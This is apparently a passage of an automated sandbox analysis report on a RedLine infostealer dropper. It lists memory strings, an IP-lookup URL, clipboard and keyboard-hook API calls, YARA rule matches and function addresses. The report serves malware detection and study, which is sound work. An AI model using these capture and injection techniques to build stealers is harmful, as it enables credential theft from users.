          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24LR
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2LR
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3LR
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4LR
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5LR
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6LR
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7LR
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8LR
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9LR
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
          Source: Rarissima.exe.pif, 0000000A.00000000.1174784742.0000000000A19000.00000002.00000001.01000000.00000006.sdmp, Dici.tmp.0.dr, Rarissima.exe.pif.4.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: Rarissima.exe.pif, 0000000A.00000003.1743078453.0000000003EAB000.00000004.00000020.00020000.00000000.sdmp, Rarissima.exe.pif, 0000000A.00000003.1743286969.0000000003E38000.00000004.00000020.00020000.00000000.sdmp, Rarissima.exe.pif, 0000000A.00000003.1743982842.0000000003E18000.00000004.00000020.00020000.00000000.sdmp, Rarissima.exe.pif, 0000000A.00000003.1680425989.00000000050F0000.00000004.00000020.00020000.00000000.sdmp, Rarissima.exe.pif, 0000000A.00000003.1744137942.0000000003DF0000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2411191854.0000000000BE2000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
          Source: Dici.tmp.0.dr, Rarissima.exe.pif.4.drString found in binary or memory: https://www.autoitscript.com/autoit3/
          Source: Rarissima.exe.pif.4.drString found in binary or memory: https://www.globalsign.com/repository/0
          Source: Dici.tmp.0.dr, Rarissima.exe.pif.4.drString found in binary or memory: https://www.globalsign.com/repository/06

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          barindex
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCode function: 0_2_004073A6 SetWindowsHookExW 00000002,Function_00007377,00000000,000000000_2_004073A6
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009C4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,10_2_009C4632
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009C4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_009C4830
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009C4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,10_2_009C4632
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009B0508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,10_2_009B0508
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009DD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_009DD164

          System Summary

          barindex
          Source: 19.2.jsc.exe.be0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
          Source: 19.2.jsc.exe.be0000.0.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
          Source: 19.2.jsc.exe.be0000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 0000000A.00000003.1743982842.0000000003E18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
          Source: 0000000A.00000003.1743078453.0000000003EAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
          Source: 0000000A.00000003.1743286969.0000000003E38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
          Source: 0000000A.00000003.1680425989.00000000050F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
          Source: 00000013.00000002.2411191854.0000000000BE2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
          Source: 0000000A.00000003.1744137942.0000000003DF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009B42D5: CreateFileW,DeviceIoControl,CloseHandle,10_2_009B42D5
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009A8F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_009A8F2E
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009B5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,10_2_009B5778
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCode function: 0_2_00404AEB0_2_00404AEB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCode function: 0_2_0040F8A30_2_0040F8A3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCode function: 0_2_00414A330_2_00414A33
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCode function: 0_2_0041237F0_2_0041237F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCode function: 0_2_004146C10_2_004146C1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCode function: 0_2_0041479B0_2_0041479B
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_0095B02010_2_0095B020
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009594E010_2_009594E0
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_00959C8010_2_00959C80
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009723F510_2_009723F5
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009D840010_2_009D8400
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_0098650210_2_00986502
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_0095E6F010_2_0095E6F0
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_0098265E10_2_0098265E
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_0097282A10_2_0097282A
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009889BF10_2_009889BF
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009D0A3A10_2_009D0A3A
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_00986A7410_2_00986A74
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_00960BE010_2_00960BE0
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009AEDB210_2_009AEDB2
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_0097CD5110_2_0097CD51
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009D0EB710_2_009D0EB7
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009B8E4410_2_009B8E44
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_00986FE610_2_00986FE6
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009733B710_2_009733B7
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_0097F40910_2_0097F409
